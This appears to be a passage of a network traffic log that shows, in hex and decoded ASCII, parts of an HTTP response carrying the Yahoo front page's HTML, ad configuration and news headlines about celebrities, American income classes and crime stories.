                                                                                                                                                                        2023-06-02 11:13:21 UTC707INData Raw: 6c 6e 3b 62 70 6f 73 3a 31 3b 63 70 6f 73 3a 31 37 3b 63 70 6f 73 79 3a 33 35 3b 72 73 70 6e 73 3a 6e 61 76 3b 74 31 3a 61 33 3b 74 32 3a 73 74 72 6d 3b 74 33 3a 63 74 3b 63 63 6f 64 65 3a 6d 65 67 61 73 74 72 65 61 6d 5f 75 6e 69 66 69 65 64 5f 5f 65 6e 2d 55 53 5f 5f 66 72 6f 6e 74 70 61 67 65 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 73 6b 74 6f 70 5f 5f 67 61 5f 5f 6d 61 69 6e 2e 66 70 45 78 70 6c 3b 63 74 3a 73 6c 69 64 65 73 68 6f 77 3b 67 3a 30 66 64 30 37 66 35 31 2d 37 35 62 65 2d 33 36 31 35 2d 39 32 65 35 2d 38 35 39 32 66 38 62 31 63 32 66 37 3b 67 72 70 74 3a 73 74 6f 72 79 43 6c 75 73 74 65 72 3b 70 6b 67 74 3a 63 6c 75 73 74 65 72 5f 61 6c 6c 5f 69 6d 67 3b 70 6f 73 3a 32 3b 73 6c 6b 3a 50 65 74 65 20 44 61 76 69 64
                                                                                                                                                                        Data Ascii: ln;bpos:1;cpos:17;cposy:35;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__main.fpExpl;ct:slideshow;g:0fd07f51-75be-3615-92e5-8592f8b1c2f7;grpt:storyCluster;pkgt:cluster_all_img;pos:2;slk:Pete David
                                                                                                                                                                        2023-06-02 11:13:21 UTC708INData Raw: 33 34 30 30 2d 33 64 62 36 2d 62 32 64 61 2d 66 30 62 38 31 30 31 32 65 62 66 31 22 20 64 61 74 61 2d 70 61 72 65 6e 74 2d 75 75 69 64 3d 22 36 66 33 37 66 38 36 33 2d 33 36 64 32 2d 33 34 35 63 2d 39 30 66 62 2d 63 64 62 64 30 63 35 37 31 39 36 30 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 31 37 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 33 36 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 30 33 31 2c 30 30 31 30 30 30 30 36 39 2c 30 30 31 30 30 30 32 38 38 22 20 64 61 74 61 2d 77 69 6b 69 73 3d 22 50 65 74 65 5f 44 61 76 69 64 73 6f 6e 2c 43 68 61 73 65 5f 53 75 69 5f 57 6f 6e 64 65 72 73 2c 4b 69 6d 5f 4b 61 72 64 61 73 68 69 61 6e 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65
                                                                                                                                                                        Data Ascii: 3400-3db6-b2da-f0b81012ebf1" data-parent-uuid="6f37f863-36d2-345c-90fb-cdbd0c571960" data-type="1" data-cpos="17" data-cposy="36" data-ycts="001000031,001000069,001000288" data-wikis="Pete_Davidson,Chase_Sui_Wonders,Kim_Kardashian" data-test-locator="stre
                                                                                                                                                                        2023-06-02 11:13:21 UTC709INData Raw: 2d 63 6f 62 61 6c 74 29 20 43 28 2d 2d 64 6f 72 79 29 3a 68 20 46 77 28 62 29 20 4c 69 6e 65 43 6c 61 6d 70 28 33 2c 34 35 70 78 29 20 50 65 6e 64 28 31 30 70 78 29 2d 2d 6d 64 31 31 36 30 20 44 28 69 29 2d 2d 6d 64 31 31 36 30 22 3e 50 65 74 65 20 44 61 76 69 64 73 6f 6e 20 61 6e 64 20 43 68 61 73 65 20 53 75 69 20 57 6f 6e 64 65 72 73 20 53 65 65 6d 69 6e 67 6c 79 20 42 75 79 20 61 20 50 75 70 70 79 20 54 6f 67 65 74 68 65 72 20 41 6d 69 64 20 52 6f 6d 61 6e 63 65 3a 20 44 65 74 61 69 6c 73 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 43 28 24 73 74 72 65 61 6d 49 74 65 6d 47 72 61 79 29 20 46 7a 28 31 31 70 78 29 20 4d 74 28 32 70 78 29 20 56 61 28 62 29 20 44 28 69 62 29 2d 2d 6d 64 31 31 36 30 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61
                                                                                                                                                                        Data Ascii: -cobalt) C(--dory):h Fw(b) LineClamp(3,45px) Pend(10px)--md1160 D(i)--md1160">Pete Davidson and Chase Sui Wonders Seemingly Buy a Puppy Together Amid Romance: Details</div><div class="C($streamItemGray) Fz(11px) Mt(2px) Va(b) D(ib)--md1160" data-test-loca
                                                                                                                                                                        2023-06-02 11:13:21 UTC709INData Raw: 6c 75 73 74 65 72 2d 70 75 62 22 3e 55 73 20 57 65 65 6b 6c 79 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 20 50 6f 73 28 72 29 22 3e 3c 64 69 76 20 64 61 74 61 2d 62 75 63 6b 65 74 3d 22 39 30 30 22 20 64 61 74 61 2d 63 66 67 3d 22 7b 26 71 75 6f 74 3b 61 64 4d 65 74 61 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 61 64 63 68 6f 69 63 65 73 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 6c 65 67 61 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 75 73 2f 65 6e 2f 79 61 68 6f 6f 2f 70 72 69 76 61 63 79 2f 61 64 69 6e 66 6f 2f 69 6e 64 65 78 2e 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61
                                                                                                                                                                        Data Ascii: luster-pub">Us Weekly</div></a></li></ul></div></div><div class="drawer-fetch-boundary Pos(r)"><div data-bucket="900" data-cfg="{&quot;adMeta&quot;:{&quot;adchoicesUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;a
                                                                                                                                                                        2023-06-02 11:13:21 UTC711INData Raw: 61 74 65 64 22 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 64 72 61 77 65 72 20 54 72 73 64 65 28 30 2e 33 73 29 20 54 72 73 64 75 28 30 2e 37 73 29 20 54 72 73 74 66 28 65 69 6f 29 20 54 72 73 70 28 6d 61 78 2d 68 65 69 67 68 74 29 20 4d 61 68 28 30 70 78 29 20 73 68 6f 77 2d 64 72 61 77 65 72 5f 4d 61 68 28 32 38 30 70 78 29 20 44 28 6e 29 20 64 72 61 77 65 72 2d 62 65 61 63 6f 6e 5f 44 28 62 29 20 4f 76 28 68 29 20 73 74 72 65 61 6d 2d 72 65 6c 61 74 65 64 2d 64 72 61 77 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 74 61 72 67 65 74 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 66 65 65 64 62 61 63 6b 2d 64 69 61 6c 6f 67 22 3e 20 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f
                                                                                                                                                                        Data Ascii: ated" class="stream-drawer Trsde(0.3s) Trsdu(0.7s) Trstf(eio) Trsp(max-height) Mah(0px) show-drawer_Mah(280px) D(n) drawer-beacon_D(b) Ov(h) stream-related-drawer"><div class="drawer-fetch-target"></div></div><div class="adfeedback-dialog"> </div></div></
                                                                                                                                                                        2023-06-02 11:13:21 UTC712INData Raw: 6e 74 70 61 67 65 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 73 6b 74 6f 70 5f 5f 67 61 5f 5f 6d 61 69 6e 2e 66 70 45 78 70 6c 3b 63 74 3a 73 74 6f 72 79 3b 67 3a 39 36 39 66 36 64 31 66 2d 63 61 63 36 2d 33 64 34 32 2d 62 62 39 63 2d 38 30 36 65 38 63 38 63 62 38 36 63 3b 67 72 70 74 3a 73 69 6e 67 6c 65 73 74 6f 72 79 3b 70 6b 67 74 3a 6f 72 70 68 61 6e 5f 69 6d 67 3b 70 6f 73 3a 31 3b 63 6e 74 5f 74 70 63 3a 42 75 73 69 6e 65 73 73 3b 73 6c 6b 3a 48 65 72 65 26 23 78 32 37 3b 73 20 74 68 65 20 61 6e 6e 75 61 6c 20 69 6e 63 6f 6d 65 20 79 6f 75 20 6e 65 65 64 20 74 6f 20 66 61 6c 6c 20 69 6e 20 41 6d 65 72 69 63 61 26 23 78 32 37 3b 73 20 6c 6f 77 65 72 2c 20 6d 69 64 64 6c 65 2c 20 61 6e 64 20 75 70 70 65 72 20 63 6c 61 73 73 20
                                                                                                                                                                        Data Ascii: ntpage__default__default__desktop__ga__main.fpExpl;ct:story;g:969f6d1f-cac6-3d42-bb9c-806e8c8cb86c;grpt:singlestory;pkgt:orphan_img;pos:1;cnt_tpc:Business;slk:Here&#x27;s the annual income you need to fall in America&#x27;s lower, middle, and upper class
                                                                                                                                                                        2023-06-02 11:13:21 UTC713INData Raw: 2d 6e 65 74 2d 77 6f 72 74 68 2d 66 61 6c 6c 2d 61 6d 65 72 69 63 61 73 2d 31 33 30 30 30 30 35 33 35 2e 68 74 6d 6c 22 20 64 61 74 61 2d 79 6c 6b 3d 22 69 74 63 3a 30 3b 65 6c 6d 3a 68 64 6c 6e 3b 65 6c 6d 74 3a 63 74 3b 62 70 6f 73 3a 31 3b 63 70 6f 73 3a 31 38 3b 63 70 6f 73 79 3a 33 37 3b 72 73 70 6e 73 3a 6e 61 76 3b 74 31 3a 61 33 3b 74 32 3a 73 74 72 6d 3b 74 33 3a 63 74 3b 63 63 6f 64 65 3a 6d 65 67 61 73 74 72 65 61 6d 5f 75 6e 69 66 69 65 64 5f 5f 65 6e 2d 55 53 5f 5f 66 72 6f 6e 74 70 61 67 65 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 73 6b 74 6f 70 5f 5f 67 61 5f 5f 6d 61 69 6e 2e 66 70 45 78 70 6c 3b 63 74 3a 73 74 6f 72 79 3b 67 3a 39 36 39 66 36 64 31 66 2d 63 61 63 36 2d 33 64 34 32 2d 62 62 39 63 2d 38 30 36 65 38
                                                                                                                                                                        Data Ascii: -net-worth-fall-americas-130000535.html" data-ylk="itc:0;elm:hdln;elmt:ct;bpos:1;cpos:18;cposy:37;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__main.fpExpl;ct:story;g:969f6d1f-cac6-3d42-bb9c-806e8
                                                                                                                                                                        2023-06-02 11:13:21 UTC714INData Raw: 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 79 61 68 6f 6f 2d 68 6f 6d 65 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 61 64 2d 66 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 73 70 6f 6e 73 6f 72 65 64 55 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 6c 65 67 61 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 75 73 2f 65 6e 2f 79 61 68 6f 6f 2f 70 72 69 76 61 63 79 2f 61 64 69 6e 66 6f 2f 69 6e 64 65 78 2e 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 44 72 61 77 65 72 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c
                                                                                                                                                                        Data Ascii: Url&quot;:&quot;https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,
                                                                                                                                                                        2023-06-02 11:13:21 UTC716INData Raw: 61 73 73 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 20 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 20 50 6f 73 28 72 29 20 42 67 63 28 2d 2d 77 68 69 74 65 29 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 20 64 61 74 61 2d 75 75 69 64 3d 22 38 34 64 64 62 38 62 61 2d 32 38 64 63 2d 33 65 32 35 2d 39 34 37 36 2d 34 32 38 30 31 30 33 64 65 32 61 30 22 20 64 61 74 61 2d 63 70 6f 73 3d 22 31 39 22 20 64 61 74 61 2d 63 70 6f 73 79 3d 22 33 38 22 20 64 61 74 61 2d 79 63 74 73 3d 22 30 30 31 30 30 30 36 36 37 2c 30 30 31 30 30 30 37 38 30 22 20 64 61 74 61 2d 77 69 6b 69 73 3d 22 47 75 61 64 61 6c 61 6a 61 72 61 2c 43 61 6c 6c 5f 63 65 6e 74 72 65 2c 4d 65 78 69 63 6f 22 20 64 61 74 61 2d 70 72 6f 70 65 72 74 79 3d 22 57 6f 72 6c 64 22 20 64 61 74 61 2d 69 31
                                                                                                                                                                        Data Ascii: ass="stream-item js-stream-content Pos(r) Bgc(--white)" data-type="1" data-uuid="84ddb8ba-28dc-3e25-9476-4280103de2a0" data-cpos="19" data-cposy="38" data-ycts="001000667,001000780" data-wikis="Guadalajara,Call_centre,Mexico" data-property="World" data-i1
                                                                                                                                                                        2023-06-02 11:13:21 UTC717INData Raw: 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 79 4e 44 59 37 63 54 30 34 4d 44 74 33 50 54 51 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 7a 65 6e 66 73 2e 63 6f 6d 2f 65 6e 2f 63 6e 6e 5f 61 72 74 69 63 6c 65 73 5f 38 37 35 2f 65 61 33 64 32 62 35 30 38 63 31 37 39 62 64 36 63 34 63 66 38 37 37 61 34 31 31 38 66 32 66 38 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61 67 65 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 65 6e 64 28 34 35 70 78 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 7a 28 31 36 70 78 29 20 46 77 28 62
                                                                                                                                                                        Data Ascii: /Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/cnn_articles_875/ea3d2b508c179bd6c4cf877a4118f2f8.cf.jpg" alt="" data-test-locator="stream-item-image"/></a></div> </div><div class="Pend(45px)"><div class="Fz(16px) Fw(b
                                                                                                                                                                        2023-06-02 11:13:21 UTC718INData Raw: 73 2d 75 75 69 64 3d 22 38 34 64 64 62 38 62 61 2d 32 38 64 63 2d 33 65 32 35 2d 39 34 37 36 2d 34 32 38 30 31 30 33 64 65 32 61 30 22 20 64 61 74 61 2d 73 74 6f 72 79 2d 6c 61 62 65 6c 3d 22 57 6f 72 6c 64 22 3e 3c 73 70 61 6e 20 69 64 3d 22 73 74 72 65 61 6d 5f 69 74 65 6d 5f 74 69 74 6c 65 5f 31 39 22 3e 4d 65 78 69 63 6f 20 70 6f 6c 69 63 65 20 66 69 6e 64 20 34 35 20 62 61 67 73 20 63 6f 6e 74 61 69 6e 69 6e 67 20 62 6f 64 79 20 70 61 72 74 73 20 e2 80 98 6d 61 74 63 68 69 6e 67 20 63 68 61 72 61 63 74 65 72 69 73 74 69 63 73 e2 80 99 20 6f 66 20 6d 69 73 73 69 6e 67 20 63 61 6c 6c 20 63 65 6e 74 65 72 20 73 74 61 66 66 3c 2f 73 70 61 6e 3e 3c 75 20 63 6c 61 73 73 3d 22 53 74 72 65 74 63 68 65 64 42 6f 78 22 3e 3c 2f 75 3e 3c 2f 61 3e 3c 2f 68 33 3e
                                                                                                                                                                        Data Ascii: s-uuid="84ddb8ba-28dc-3e25-9476-4280103de2a0" data-story-label="World"><span id="stream_item_title_19">Mexico police find 45 bags containing body parts matching characteristics of missing call center staff</span><u class="StretchedBox"></u></a></h3>
                                                                                                                                                                        2023-06-02 11:13:21 UTC720INData Raw: 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 63 70 6f 73 26 71 75 6f 74 3b 3a 31 39 2c 26 71 75 6f 74 3b 63 70 6f 73 79 26 71 75 6f 74 3b 3a 33 38 7d 2c 26 71 75 6f 74 3b 69 6e 74 6c 46 75 6a 69 55 69 43 6f 6e 66 69 67 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 72 6f 75 6e 64 65 64 43 6f 72 6e 65 72 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 75 73 65 56 65 72 74 69 63 61 6c 43 6f 6e 74 72 6f 6c 49 63 6f 6e 73 26 71 75 6f 74 3b 3a 66 61 6c 73 65 7d 2c 26 71 75 6f 74 3b 78 68 72 50 61 74 68 50 72 65 66 69 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6e 63 70 50 61 72 61 6d 73 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 71 75 65 72 79 26 71 75 6f 74 3b 3a 7b 26 71
                                                                                                                                                                        Data Ascii: &quot;,&quot;cpos&quot;:19,&quot;cposy&quot;:38},&quot;intlFujiUiConfig&quot;:{&quot;roundedCorner&quot;:false,&quot;useVerticalControlIcons&quot;:false},&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&q
                                                                                                                                                                        2023-06-02 11:13:21 UTC721INData Raw: 2d 6d 6f 64 75 6c 65 3d 22 73 74 72 65 61 6d 5f 69 74 65 6d 5f 32 30 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4d 69 68 28 31 34 30 70 78 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 79 28 31 32 70 78 29 20 50 6f 73 28 72 29 20 43 66 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 6c 28 73 74 61 72 74 29 20 50 6f 73 28 72 29 20 4d 65 6e 64 28 32 35 70 78 29 20 4d 61 77 28 32 32 30 70 78 29 20 57 28 32 36 25 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 28 30 29 20 54 28 30 70 78 29 20 42 64 72 73 28 32 70 78 29 20 53 74 61 72 74 28 30 29 20 50 6f 73 28 72 29 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 35 2e 39 31 25 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61
                                                                                                                                                                        Data Ascii: -module="stream_item_20"><div class="Mih(140px)"><div class="Py(12px) Pos(r) Cf"><div class="Fl(start) Pos(r) Mend(25px) Maw(220px) W(26%)"><div class="H(0) T(0px) Bdrs(2px) Start(0) Pos(r)" style="padding-bottom:55.91%" data-test-locator="stream-item-ima
                                                                                                                                                                        2023-06-02 11:13:21 UTC722INData Raw: 28 31 29 22 20 69 64 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 70 75 62 6c 69 73 68 65 72 5f 32 30 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 70 75 62 6c 69 73 68 65 72 22 3e 53 65 76 65 6e 74 65 65 6e 3c 2f 64 69 76 3e 3c 68 33 20 63 6c 61 73 73 3d 22 4c 69 6e 65 43 6c 61 6d 70 28 32 2c 32 2e 36 65 6d 29 20 4d 62 28 34 70 78 29 20 4d 62 28 30 29 2d 2d 6d 64 31 31 36 30 20 4d 74 28 30 29 20 4c 68 28 31 2e 33 29 20 46 7a 28 31 39 70 78 29 20 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70
                                                                                                                                                                        Data Ascii: (1)" id="stream-item-publisher_20" data-test-locator="stream-item-publisher">Seventeen</div><h3 class="LineClamp(2,2.6em) Mb(4px) Mb(0)--md1160 Mt(0) Lh(1.3) Fz(19px) stream-item-title" data-test-locator="stream-item-title"><a class="js-content-viewer rap
                                                                                                                                                                        2023-06-02 11:13:21 UTC723INData Raw: 6c 61 20 54 68 6f 72 6e 65 20 6a 75 73 74 20 67 6f 74 20 65 6e 67 61 67 65 64 20 61 6e 64 20 73 68 65 20 74 6f 6f 6b 20 74 68 65 20 6d 6f 6d 65 6e 74 20 74 6f 20 73 68 6f 77 20 6f 66 66 20 68 65 72 20 6d 65 67 61 2d 74 6f 6e 65 64 20 61 62 73 20 69 6e 20 61 6e 20 75 6e 64 65 72 62 6f 6f 62 2d 62 61 72 69 6e 67 20 74 6f 70 2e 20 42 65 6c 6c 61 20 69 73 20 61 6c 6c 20 61 62 6f 75 74 20 66 65 65 6c 69 6e 67 20 67 6f 6f 64 20 69 6e 20 79 6f 75 72 20 62 6f 64 79 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 61 77 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 20 50 6f 73 28 72 29 22 3e 3c 64 69 76 20 64 61 74 61 2d 62 75 63 6b 65 74 3d 22 39 30 30 22 20 64 61 74 61 2d 63 66 67 3d 22 7b 26 71 75 6f 74 3b 61 64
                                                                                                                                                                        Data Ascii: la Thorne just got engaged and she took the moment to show off her mega-toned abs in an underboob-baring top. Bella is all about feeling good in your body.</p></div></div><div class="drawer-fetch-boundary Pos(r)"><div data-bucket="900" data-cfg="{&quot;ad
                                                                                                                                                                        2023-06-02 11:13:21 UTC725INData Raw: 74 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 22 6f 6e 4c 6f 61 64 22 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 3f 6d 5f 6d 6f 64 65 3d 6a 73 6f 6e 26 61 6d 70 3b 6d 5f 69 64 3d 72 65 61 63 74 2d 77 61 66 65 72 2d 73 74 72 65 61 6d 26 61 6d 70 3b 63 74 72 6c 3d 53 74 72 65 61 6d 52 65 6c 61 74 65 64 22 20 63 6c 61 73 73 3d 22 73 74 72 65 61 6d 2d 64 72 61 77 65 72 20 54 72 73 64 65 28 30 2e 33 73 29 20 54 72 73 64 75 28 30 2e 37 73 29 20 54 72 73 74 66 28 65 69 6f 29 20 54 72 73 70 28 6d 61 78 2d 68 65 69 67 68 74 29 20 4d 61 68 28 30 70 78 29 20 73 68 6f 77 2d 64 72 61 77 65 72 5f 4d 61 68 28 32 38 30 70 78 29 20 44 28 6e 29 20 64 72 61 77 65 72 2d 62 65 61 63 6f 6e 5f 44 28 62 29 20 4f 76
                                                                                                                                                                        Data Ascii: t" data-wf-trigger="onLoad" data-wf-url="/fp_ms/_rcv/remote?m_mode=json&amp;m_id=react-wafer-stream&amp;ctrl=StreamRelated" class="stream-drawer Trsde(0.3s) Trsdu(0.7s) Trstf(eio) Trsp(max-height) Mah(0px) show-drawer_Mah(280px) D(n) drawer-beacon_D(b) Ov
                                                                                                                                                                        2023-06-02 11:13:21 UTC726INData Raw: 70 45 78 70 6c 3b 63 74 3a 73 74 6f 72 79 3b 67 3a 39 35 35 31 65 33 66 35 2d 65 36 35 64 2d 33 63 65 63 2d 61 36 63 64 2d 39 38 62 34 36 32 65 66 61 32 65 61 3b 67 72 70 74 3a 73 69 6e 67 6c 65 73 74 6f 72 79 3b 70 6b 67 74 3a 6f 72 70 68 61 6e 5f 69 6d 67 3b 70 6f 73 3a 31 3b 63 6e 74 5f 74 70 63 3a 55 2e 53 2e 3b 73 6c 6b 3a e2 80 98 49 e2 80 99 64 20 64 6f 20 69 74 20 61 67 61 69 6e 3a e2 80 99 20 50 75 74 6e 61 6d 20 43 6f 75 6e 74 79 20 53 68 65 72 69 66 66 20 73 74 6f 70 73 20 73 63 61 6d 6d 65 72 73 20 62 79 20 73 68 6f 6f 74 69 6e 67 20 61 74 20 74 72 75 63 6b 20 74 69 72 65 3b 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70 69 64 6e 6f 66 6f 6c 6c
                                                                                                                                                                        Data Ascii: pExpl;ct:story;g:9551e3f5-e65d-3cec-a6cd-98b462efa2ea;grpt:singlestory;pkgt:orphan_img;pos:1;cnt_tpc:U.S.;slk:Id do it again: Putnam County Sheriff stops scammers by shooting at truck tire;" aria-hidden="true" class="js-content-viewer rapidnofoll
                                                                                                                                                                        2023-06-02 11:13:21 UTC727INData Raw: 32 3a 73 74 72 6d 3b 74 33 3a 63 74 3b 63 63 6f 64 65 3a 6d 65 67 61 73 74 72 65 61 6d 5f 75 6e 69 66 69 65 64 5f 5f 65 6e 2d 55 53 5f 5f 66 72 6f 6e 74 70 61 67 65 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 73 6b 74 6f 70 5f 5f 67 61 5f 5f 6d 61 69 6e 2e 66 70 45 78 70 6c 3b 63 74 3a 73 74 6f 72 79 3b 67 3a 39 35 35 31 65 33 66 35 2d 65 36 35 64 2d 33 63 65 63 2d 61 36 63 64 2d 39 38 62 34 36 32 65 66 61 32 65 61 3b 67 72 70 74 3a 73 69 6e 67 6c 65 73 74 6f 72 79 3b 70 6b 67 74 3a 6f 72 70 68 61 6e 5f 69 6d 67 3b 70 6f 73 3a 31 3b 63 6e 74 5f 74 70 63 3a 55 2e 53 2e 3b 73 6c 6b 3a e2 80 98 49 e2 80 99 64 20 64 6f 20 69 74 20 61 67 61 69 6e 3a e2 80 99 20 50 75 74 6e 61 6d 20 43 6f 75 6e 74 79 20 53 68 65 72 69 66 66 20 73 74 6f 70
                                                                                                                                                                        Data Ascii: 2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__main.fpExpl;ct:story;g:9551e3f5-e65d-3cec-a6cd-98b462efa2ea;grpt:singlestory;pkgt:orphan_img;pos:1;cnt_tpc:U.S.;slk:Id do it again: Putnam County Sheriff stop
                                                                                                                                                                        2023-06-02 11:13:21 UTC728INData Raw: 68 74 6d 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 44 72 61 77 65 72 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 65 6e 61 62 6c 65 41 64 4c 69 74 65 55 70 53 65 6c 6c 46 65 65 64 62 61 63 6b 26 71 75 6f 74 3b 3a 74 72 75 65 7d 2c 26 71 75 6f 74 3b 66 65 61 74 75 72 65 73 26 71 75 6f 74 3b 3a 7b 7d 2c 26 71 75 6f 74 3b 69 31 33 6e 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 62 70 6f 73 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 4c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 2e 53 2e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 63 70 6f 73 26 71 75 6f 74 3b 3a 32 31 2c 26 71 75 6f 74 3b 63 70 6f 73 79 26 71 75 6f 74 3b 3a 34 30 7d 2c 26 71 75 6f 74 3b 69 6e 74 6c 46 75 6a 69
                                                                                                                                                                        Data Ascii: html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&quot;i13n&quot;:{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;U.S.&quot;,&quot;cpos&quot;:21,&quot;cposy&quot;:40},&quot;intlFuji
